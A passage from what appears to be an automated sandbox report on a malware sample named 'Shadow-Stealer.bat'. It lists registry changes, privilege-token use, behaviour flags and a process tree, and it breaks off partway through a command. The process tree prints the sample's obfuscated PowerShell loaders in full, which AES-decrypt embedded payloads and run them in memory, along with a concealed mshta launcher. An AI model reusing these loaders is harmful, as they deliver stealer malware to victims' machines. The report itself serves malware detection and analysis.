| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668} | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f80cb859f6720028040b29b5540cc05aab60000 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSize = "48" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \Registry\User\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\NotificationData | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Windows\Explorer.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe
"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{5b0b2b69-7264-4637-9a9f-641bccea46a2}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{90a5ed3d-9d35-4845-ad94-9792d6a8b103}
C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 